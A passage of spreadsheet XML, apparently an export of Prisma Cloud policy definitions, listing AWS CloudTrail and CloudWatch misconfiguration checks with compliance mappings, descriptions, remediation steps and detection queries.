ATT&amp;CK v14.0 Cloud IaaS for Enterprise, HITRUST CSF v.9.6.0, PCI DSS v3.2.1</t>
        </is>
      </c>
      <c r="B1592" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1592" s="2" t="inlineStr"/>
      <c r="D1592" t="inlineStr"/>
      <c r="E1592" t="inlineStr"/>
      <c r="F1592" t="inlineStr"/>
      <c r="G1592" t="b">
        <v>1</v>
      </c>
      <c r="H15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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1592" t="inlineStr">
        <is>
          <t>aws-cloudtrail</t>
        </is>
      </c>
      <c r="K1592" t="inlineStr">
        <is>
          <t>AWS S3 Bucket Policy allows public access to CloudTrail logs</t>
        </is>
      </c>
      <c r="L1592" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M1592" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1592" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1592" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1592" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1592" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R1592" t="inlineStr">
        <is>
          <t>ISM-0854</t>
        </is>
      </c>
      <c r="S1592" t="inlineStr"/>
      <c r="T1592" t="b">
        <v>0</v>
      </c>
      <c r="U1592" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1592" t="inlineStr">
        <is>
          <t>aws-cloudtrail-describe-trails</t>
        </is>
      </c>
      <c r="W1592" t="inlineStr">
        <is>
          <t>This policy scans your bucket policy that is applied to the S3 bucket to prevent public access to the CloudTrail logs. CloudTrail logs a record of every API call made in your AWS account. These logs file are stored in an S3 bucket. Bucket policy or the access control list (ACL) applied to the S3 bucket does not prevent public access to the CloudTrail logs. It is recommended that the bucket policy or access control list (ACL) applied to the S3 bucket that stores CloudTrail logs prevents public access. Allowing public access to CloudTrail log content may aid an adversary in identifying weaknesses in the affected account's use or configuration.</t>
        </is>
      </c>
      <c r="X1592" t="inlineStr">
        <is>
          <t>1. Sign in to the AWS Console
2. Goto S3
3. Choose the reported S3 bucket and click Properties
4. In the Properties pane, click the Permissions tab.
5. If the Edit bucket policy button is present, select it.
6. Remove any statement having an effect Set to 'Allow' and a principal set to '*'.
Note: We recommend that you do not configure CloudTrail to write into an S3 bucket that resides in a different AWS account.</t>
        </is>
      </c>
      <c r="Y1592" t="inlineStr"/>
      <c r="Z1592" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-cloudtrail-describe-trails' as X; config from cloud.resource where api.name = 'aws-s3api-get-bucket-acl' as Y; filter "($.Y.bucketName==$.X.s3BucketName) and ($.Y.acl.grants[*].grantee contains AllUsers or $.Y.acl.grants[*].permission contains FullControl) and ($.Y.policy.Statement[?(@.Principal=='*' &amp;&amp; @.Effect=='Allow')].Action contains s3:* or $.Y.policy.Statement[?(@.Principal.AWS=='*' &amp;&amp; @.Effect=='Allow')].Action contains s3:*)" ; show Y;</t>
        </is>
      </c>
      <c r="AA1592" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1592" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1592" t="inlineStr">
        <is>
          <t>PC-AWS-S3-313</t>
        </is>
      </c>
      <c r="AD1592" t="b">
        <v>1</v>
      </c>
      <c r="AE1592" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1592" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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2" t="inlineStr">
        <is>
          <t>a5fe47e1-54f3-47e1-a2a3-deedfb2f70b2</t>
        </is>
      </c>
      <c r="AI1592" t="inlineStr">
        <is>
          <t>8d5fb79e-88d7-48a2-a7cf-89345197ad17</t>
        </is>
      </c>
      <c r="AJ1592" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1592" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1593">
      <c r="A1593" t="inlineStr">
        <is>
          <t>HITRUST CSF v9.3 [Deprecated], Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), NIST 800-53 Rev4, APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), NIST CSF v2.0, jbrox - GDPR, MLPS 2.0 (Level 2), Risk Management in Technology (RMiT), CSA CCM v.4.0.6, ITSG-33, NIST CSF, Secure Controls Framework (SCF) - 2024.2, HITRUST CSF v9.3 [Deprecated], CRI Profile v1.2.1, CSA CCM v4.0.12, MITRE ATT&amp;CK v6.3 [Deprecated], NIST CSF, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, NYDFS 23 CRR-NY 500.0, SOC 2, PCI DSS v3.2.1, GDPR, ISO 27002:2022, kfirdaus AWS Account-CS, NIST CSF, CSA CCM v.4.0.6, Copy of CIS Controls v8, CyberSecurity Law of the People's Republic of China, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, HITRUST CSF v9.3 [Deprecated], NIST CSF, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, HITRUST CSF v9.3 [Deprecated], CDC NIST 800-53 Rev4, Secure Controls Framework (SCF) - 2024.2, CSA CCM v3.0.1, Telecommunications Security Act - TSA, NIST CSF, NIST CSF, MAS TRM 2021, HITRUST CSF v9.3 [Deprecated], HITRUST CSF v.9.6.0, HITRUST v.9.4.2 [Deprecated], TX-RAMP Level 1, NIST SP 800-171 Revision 2, Secure Controls Framework (SCF) - 2022.2.1, ISO 27001:2013, NIST SP 800-172, CRI Profile v2.0, TX-RAMP Level 2, CIS Controls v8, MITRE ATT&amp;CK v8.2 [Deprecated], Korea – Information Security Management System (ISMS), NIST CSF, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST v.9.4.2 [Deprecated], NYDFS 23 CRR-NY 500.0, HITRUST CSF v9.3 [Deprecated], NIST CSF, CIS Controls v8.1, RBI Baseline Cyber Security and Resilience Requirements, NIST CSF, HITRUST CSF v.11.2.0, NIST 800-53 Rev 5, NIST CSF, CyberSecurity Law of the People's Republic of China, ISO 27001:2013, Brazilian Data Protection Law (LGPD), SOC 2, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NIST 800-171 Rev1, CIS Controls v8.1, Risk Management in Technology (RMiT), Korea – Information Security Management System (ISMS), MLPS 2.0, CHC HITRUST CSF v.9.6.0, Insurance Regulatory And Development Authority Of India, kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, CIS Controls v7.1, CDC NIST 800-53 Rev4, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), SOC 2, NIST CSF v2.0, HIPAA, kfirdaus AWS Account-CS, CSA CCM v.4.0.6, PIPEDA, MLPS 2.0 (Level 3), NIST CSF, kashan ACSC Information Security Manual (ISM), NIST CSF, NIST CSF, NIST CSF, NIST 800-53 Rev 5, NIST 800-53 Rev4, HITRUST CSF v9.3 [Deprecated], CRI Profile v2.0, NIST CSF, CSA CCM v4.0.12, NYDFS 23 CRR-NY 500.0, CCPA 2018, CSA CCM v.4.0.6, NIST 800-171 Rev1, CSA CCM v4.0.12, DORA, PCI DSS v4.0, NIST CSF, DORA, Copy of ACSC Information Security Manual (ISM)-clone, PCI DSS v3.2.1, HITRUST CSF v.9.6.0, ISO/IEC 27001:2022, NIST CSF, NIST CSF, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CHC HITRUST CSF v.9.6.0, CSA CCM v3.0.1, NIST CSF v2.0, NIST CSF v2.0, HITRUST CSF v9.3 [Deprecated], Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs)</t>
        </is>
      </c>
      <c r="B1593" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1593" s="2" t="inlineStr"/>
      <c r="D1593" t="inlineStr"/>
      <c r="E1593" t="inlineStr"/>
      <c r="F1593" t="inlineStr"/>
      <c r="G1593" t="b">
        <v>1</v>
      </c>
      <c r="H15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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1593" t="inlineStr">
        <is>
          <t>aws-cloudtrail</t>
        </is>
      </c>
      <c r="K1593" t="inlineStr">
        <is>
          <t>AWS CloudTrail logs should integrate with CloudWatch for all regions</t>
        </is>
      </c>
      <c r="L1593" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1593" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1593" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1593" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1593" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1593" t="inlineStr">
        <is>
          <t>Control Category: 09.0</t>
        </is>
      </c>
      <c r="R1593" t="inlineStr">
        <is>
          <t>09.aa</t>
        </is>
      </c>
      <c r="S1593" t="inlineStr"/>
      <c r="T1593" t="b">
        <v>0</v>
      </c>
      <c r="U1593" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1593" t="inlineStr">
        <is>
          <t>aws-cloudtrail-describe-trails</t>
        </is>
      </c>
      <c r="W1593" t="inlineStr">
        <is>
          <t>This policy identifies the Cloudtrails which is not integrated with cloudwatch for all regions. CloudTrail uses Amazon S3 for log file storage and delivery, so log files are stored durably. In addition to capturing CloudTrail logs within a specified S3 bucket for long term analysis, realtime analysis can be performed by configuring CloudTrail to send logs to CloudWatch Logs. For a trail that is enabled in all regions in an account, CloudTrail sends log files from all those regions to a CloudWatch Logs log group. It is recommended that CloudTrail logs be sent to CloudWatch Logs.</t>
        </is>
      </c>
      <c r="X1593" t="inlineStr">
        <is>
          <t>1. Sign into AWS and navigate to CloudTrail service.
2. Click on Trail in the left menu navigation and choose the reported cloudtrail.
3. Go to CloudWatch Logs section and click Configure.
4. Define a new or select an existing log group and click Continue to complete the process.</t>
        </is>
      </c>
      <c r="Y1593" t="inlineStr"/>
      <c r="Z1593" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-cloudtrail-describe-trails' as X; config from cloud.resource where api.name = 'aws-cloudtrail-get-trail-status' as Y; filter '(($.X.name == $.Y.trail) and ($.X.cloudWatchLogsLogGroupArn is not empty and $.X.cloudWatchLogsLogGroupArn exists) and $.X.isMultiRegionTrail is false and ($.Y.status.latestCloudWatchLogsDeliveryTime exists))'; show X;</t>
        </is>
      </c>
      <c r="AA1593" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1593" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1593" t="inlineStr">
        <is>
          <t>PC-AWS-CT-80</t>
        </is>
      </c>
      <c r="AD1593" t="b">
        <v>1</v>
      </c>
      <c r="AE1593" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1593" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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3" t="inlineStr">
        <is>
          <t>962e0daa-3c2d-4d79-9a5f-e0bf8fd4bb3b</t>
        </is>
      </c>
      <c r="AI1593" t="inlineStr">
        <is>
          <t>962e0daa-3c2d-4d79-9a5f-e0bf8fd4bb3b</t>
        </is>
      </c>
      <c r="AJ1593" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1593" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1594">
      <c r="A1594" t="inlineStr">
        <is>
          <t>HITRUST CSF v9.3 [Deprecated], RBI Baseline Cyber Security and Resilience Requirements, CRI Profile v2.0, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST 800-53 Rev4, APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), PCI DSS v4.0, NIST CSF v2.0, jbrox - GDPR, MLPS 2.0 (Level 2), ISO 27002:2022, Risk Management in Technology (RMiT), Australian Energy Sector Cyber Security Framework (AESCSF), ITSG-33, MITRE ATT&amp;CK v6.3 [Deprecated], Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, PCI DSS v4.0, MITRE ATT&amp;CK v12, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, NYDFS 23 CRR-NY 500.0, SOC 2, CIS Controls v8, HITRUST CSF v.11.2.0, GDPR, kfirdaus AWS Account-CS, CIS Controls v7.1, ISO/IEC 27001:2022, ISO/IEC 27001:2022, MITRE ATT&amp;CK v6.3 [Deprecated], ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), HITRUST CSF v9.3 [Deprecated], MITRE ATT&amp;CK v6.3 [Deprecated], CDC NIST 800-53 Rev4, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MAS TRM 2021, PCI DSS v4.0, HITRUST CSF v.9.6.0, ISO 27002:2022, CSA CCM v.4.0.6, TX-RAMP Level 1, NIST SP 800-171 Revision 2, Secure Controls Framework (SCF) - 2022.2.1, ISO 27001:2013, Copy of CIS Controls v8, PCI DSS v4.0, TX-RAMP Level 2, CSA CCM v4.0.12, MITRE ATT&amp;CK v8.2 [Deprecated], NIST CSF v2.0, Copy of ACSC Information Security Manual (ISM)-clone, NYDFS 23 CRR-NY 500.0, NIST CSF, CHC HITRUST CSF v.9.6.0, CSA CCM v4.0.12, RBI Baseline Cyber Security and Resilience Requirements, MITRE ATT&amp;CK v6.3 [Deprecated], Copy of CIS Controls v8, Brazilian Data Protection Law (LGPD), PCI DSS v4.0, PCI DSS v4.0, CIS Controls v8, FFIEC, NIST 800-171 Rev1, CIS Controls v8.1, CRI Profile v2.0, PCI DSS v4.0, Risk Management in Technology (RMiT), CHC HITRUST CSF v.9.6.0, Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, CRI Profile v1.2.1, HITRUST CSF v.11.2.0, ISO 27002:2022, MITRE ATT&amp;CK v6.3 [Deprecated], kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, CIS Controls v7.1, PCI DSS v4.0, SOC 2, PCI DSS v3.2.1, HIPAA, kfirdaus AWS Account-CS, PIPEDA, NIST CSF, kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, PCI DSS v4.0, CRI Profile v1.2.1, NIST 800-53 Rev 5, HITRUST CSF v9.3 [Deprecated], CSA CCM v.4.0.6, CRI Profile v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NYDFS 23 CRR-NY 500.0, FFIEC, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, CCPA 2018, MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CSA CCM v.4.0.6, NIST 800-171 Rev1, CIS Controls v8.1, CSA CCM v4.0.12, DORA, CSA CCM v.4.0.6, HITRUST CSF v.9.6.0, NIST CSF, Matt's ATT&amp;ACK, ISO/IEC 27001:2022, DORA, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST CSF v.9.6.0, MITRE ATT&amp;CK v6.3 [Deprecated], PCI DSS v4.0, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, CHC HITRUST CSF v.9.6.0, NIST CSF v2.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs)</t>
        </is>
      </c>
      <c r="B1594" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1594" s="2" t="inlineStr"/>
      <c r="D1594" t="inlineStr"/>
      <c r="E1594" t="inlineStr"/>
      <c r="F1594" t="inlineStr"/>
      <c r="G1594" t="b">
        <v>1</v>
      </c>
      <c r="H15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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1594" t="inlineStr">
        <is>
          <t>aws-cloudtrail</t>
        </is>
      </c>
      <c r="K1594" t="inlineStr">
        <is>
          <t>AWS CloudTrail is not enabled on the account</t>
        </is>
      </c>
      <c r="L1594" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1594" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1594" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1594" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1594" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1594" t="inlineStr">
        <is>
          <t>Control Category: 09.0</t>
        </is>
      </c>
      <c r="R1594" t="inlineStr">
        <is>
          <t>09.aa</t>
        </is>
      </c>
      <c r="S1594" t="inlineStr">
        <is>
          <t>Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1594" t="b">
        <v>0</v>
      </c>
      <c r="U1594" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1594" t="inlineStr">
        <is>
          <t>aws-cloudtrail-describe-trails</t>
        </is>
      </c>
      <c r="W1594" t="inlineStr">
        <is>
          <t>Checks to ensure that CloudTrail is enabled on the account. AWS CloudTrail is a service that enables governance, compliance, operational &amp; risk auditing of the AWS account. It is a compliance and security best practice to turn on CloudTrail to get a complete audit trail of activities across various services.</t>
        </is>
      </c>
      <c r="X1594" t="inlineStr">
        <is>
          <t>1. Login to the AWS Console and navigate to the 'CloudTrail' service.
2. Follow the instructions below to enable CloudTrail on the account.
http://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-create-and-update-a-trail.html</t>
        </is>
      </c>
      <c r="Y1594" t="inlineStr"/>
      <c r="Z1594" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' and api.name='aws-cloudtrail-describe-trails' as X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA1594" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1594" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1594" t="inlineStr">
        <is>
          <t>PC-AWS-CT-34</t>
        </is>
      </c>
      <c r="AD1594" t="b">
        <v>1</v>
      </c>
      <c r="AE1594" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1594" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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4" t="inlineStr">
        <is>
          <t>05befc8b-c78a-45e9-98dc-c7fbaef580e7</t>
        </is>
      </c>
      <c r="AI1594" t="inlineStr">
        <is>
          <t>a48018a5-e590-464b-96d7-c1f7db6b4caf</t>
        </is>
      </c>
      <c r="AJ1594" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1594" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1595">
      <c r="A1595" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, RBI Baseline Cyber Security and Resilience Requirements, CRI Profile v2.0, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), CDC NIST 800-53 Rev4, APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), PCI DSS v4.0, NIST CSF v2.0, ISO/IEC 27017:2015, MLPS 2.0 (Level 2), Telecommunications Security Act - TSA, ISO 27002:2022, Risk Management in Technology (RMiT), Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27002:2013, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, ITSG-33, Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, PCI DSS v4.0, MITRE ATT&amp;CK v12, CSA CCM v.4.0.1, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, NYDFS 23 CRR-NY 500.0, ISO/IEC 27017:2015, PCI DSS v3.2.1, CIS Controls v8, CSA CCM v.4.0.1, GDPR, ISO/IEC 27017:2015, kfirdaus AWS Account-CS, CIS Controls v7.1, ISO/IEC 27001:2022, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, APRA (CPS 234) Information Security, Telecommunications Security Act - TSA, Telecommunications Security Act - TSA, MAS TRM 2021, PCI DSS v4.0, HITRUST CSF v.9.6.0, HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, CSA CCM v.4.0.6, TX-RAMP Level 1, NIST SP 800-171 Revision 2, Secure Controls Framework (SCF) - 2022.2.1, NIST 800-53 Rev 5, NIST SP 800-172, Copy of CIS Controls v8, PCI DSS v4.0, TX-RAMP Level 2, CSA CCM v4.0.12, NIST CSF v2.0, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST v.9.4.2 [Deprecated], CHC HITRUST CSF v.9.6.0, CSA CCM v4.0.12, RBI Baseline Cyber Security and Resilience Requirements, HITRUST CSF v.11.2.0, Copy of CIS Controls v8, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, PCI DSS v4.0, PCI DSS v4.0, CIS Controls v8, FFIEC, CSA CCM v.4.0.1, CIS Controls v8.1, CRI Profile v2.0, PCI DSS v4.0, Risk Management in Technology (RMiT), CHC HITRUST CSF v.9.6.0, Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, CRI Profile v1.2.1, HITRUST CSF v.11.2.0, NIST 800-53 Rev4, ISO 27002:2022, kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, CIS Controls v7.1, ISO/IEC 27002:2013, PCI DSS v4.0, SOC 2, APRA (CPS 234) Information Security, HIPAA, kfirdaus AWS Account-CS, Fedramp (Moderate), NIST CSF, kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, PCI DSS v4.0, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, CRI Profile v1.2.1, CSA CCM v.4.0.6, CRI Profile v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, NYDFS 23 CRR-NY 500.0, FFIEC, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CSA CCM v.4.0.6, CIS Controls v8.1, CSA CCM v4.0.12, DORA, CSA CCM v.4.0.6, HITRUST CSF v.9.6.0, Matt's ATT&amp;ACK, ISO/IEC 27001:2022, DORA, Copy of ACSC Information Security Manual (ISM)-clone, PCI DSS v3.2.1, HITRUST CSF v.9.6.0, PCI DSS v4.0, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CHC HITRUST CSF v.9.6.0, NIST CSF v2.0</t>
        </is>
      </c>
      <c r="B1595" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1595" s="2" t="inlineStr"/>
      <c r="D1595" t="inlineStr"/>
      <c r="E1595" t="inlineStr"/>
      <c r="F1595" t="inlineStr"/>
      <c r="G1595" t="b">
        <v>1</v>
      </c>
      <c r="H15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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1595" t="inlineStr">
        <is>
          <t>aws-cloudtrail</t>
        </is>
      </c>
      <c r="K1595" t="inlineStr">
        <is>
          <t>AWS CloudTrail logging is disabled</t>
        </is>
      </c>
      <c r="L1595" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1595" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1595" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1595" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1595" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1595" t="inlineStr">
        <is>
          <t>Control Category: 09.0</t>
        </is>
      </c>
      <c r="R1595" t="inlineStr">
        <is>
          <t>09.aa</t>
        </is>
      </c>
      <c r="S1595" t="inlineStr">
        <is>
          <t>Policy Status Review</t>
        </is>
      </c>
      <c r="T1595" t="b">
        <v>1</v>
      </c>
      <c r="U1595" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1595" t="inlineStr">
        <is>
          <t>aws-cloudtrail-describe-trails</t>
        </is>
      </c>
      <c r="W1595" t="inlineStr">
        <is>
          <t>This policy identifies the CloudTrails in which logging is disabled. AWS CloudTrail is a service that enables governance, compliance, operational &amp; risk auditing of the AWS account. It is a compliance and security best practice to turn on logging for CloudTrail across different regions to get a complete audit trail of activities across various services.
NOTE: This policy will be triggered only when you have CloudTrail configured in your AWS account and logging is disabled.</t>
        </is>
      </c>
      <c r="X1595" t="inlineStr">
        <is>
          <t>1. Sign in to AWS Console
2. Navigate to CloudTrail dashboard
3. Click on 'Trails' (Left panel)
4. Click on reported CloudTrail
5. Enable 'Logging' by hovering logging button to 'ON'
OR
If CLoudTrail is not required you can delete by clicking on the delete icon below the logging hover button. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-cloudtrail-logging-is-enabled
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-cloudtrail-logging-is-enabled</t>
        </is>
      </c>
      <c r="Y1595" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'cloudtrail:StartLogging' permission. Successful execution will enable logging for the respective CloudTrail.",
'impact': 'Enable logging for the respective CloudTrail',
'cliScriptTemplate': 'aws cloudtrail start-logging --name $resourceName --region $region'</t>
        </is>
      </c>
      <c r="Z1595" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-cloudtrail-describe-trails' as X; config from cloud.resource where api.name = 'aws-cloudtrail-get-trail-status' as Y; filter '$.X.name equals $.Y.trail and $.Y.status.isLogging is false'; show X;
{"category":"General","resourceTypes":["aws_cloudtrail"]}</t>
        </is>
      </c>
      <c r="AA1595" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1595" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1595" t="inlineStr">
        <is>
          <t>PC-AWS-CT-526-CKV_AWS_251</t>
        </is>
      </c>
      <c r="AD1595" t="b">
        <v>1</v>
      </c>
      <c r="AE1595" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1595" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG15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5" t="inlineStr">
        <is>
          <t>626b8868-1da0-4293-a75b-e599ee73c955</t>
        </is>
      </c>
      <c r="AI1595" t="inlineStr">
        <is>
          <t>674cfb15-a1cd-415b-b312-d41b3a096d83</t>
        </is>
      </c>
      <c r="AJ1595" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1595" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1596">
      <c r="A1596" t="inlineStr"/>
      <c r="B1596" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1596" s="2" t="inlineStr"/>
      <c r="D1596" t="inlineStr"/>
      <c r="E1596" t="inlineStr"/>
      <c r="F1596" t="inlineStr"/>
      <c r="G1596" t="b">
        <v>1</v>
      </c>
      <c r="H15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596" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1596" t="inlineStr">
        <is>
          <t>aws-cloudwatch</t>
        </is>
      </c>
      <c r="K1596" t="inlineStr">
        <is>
          <t>AWS CloudWatch log groups retention set to less than 365 days</t>
        </is>
      </c>
      <c r="L1596" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1596" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1596" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1596" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1596" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1596" t="inlineStr"/>
      <c r="R1596" t="inlineStr"/>
      <c r="S1596" t="inlineStr"/>
      <c r="T1596" t="b">
        <v>0</v>
      </c>
      <c r="U1596" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1596" t="inlineStr">
        <is>
          <t>aws-cloudwatch-log-group</t>
        </is>
      </c>
      <c r="W1596" t="inlineStr">
        <is>
          <t>This policy identifies the AWS CloudWatch LogGroups having a retention period set to less than 365 days. 
CloudWatch Logs centralize and store logs from AWS services and systems. 1-year retention of the logs aids in compliance with log retention standards. Shorter retention periods can lead to the loss of historical logs needed for audits, forensic analysis, and compliance, increasing the risk of undetected issues or non-compliance.
It is recommended that AWS CloudWatch log group retention be set to at least 365 days to meet compliance needs and support audits, investigations, and analysis.</t>
        </is>
      </c>
      <c r="X1596" t="inlineStr">
        <is>
          <t>To change the log retention setting, perform the following actions:
1. Sign into the AWS console
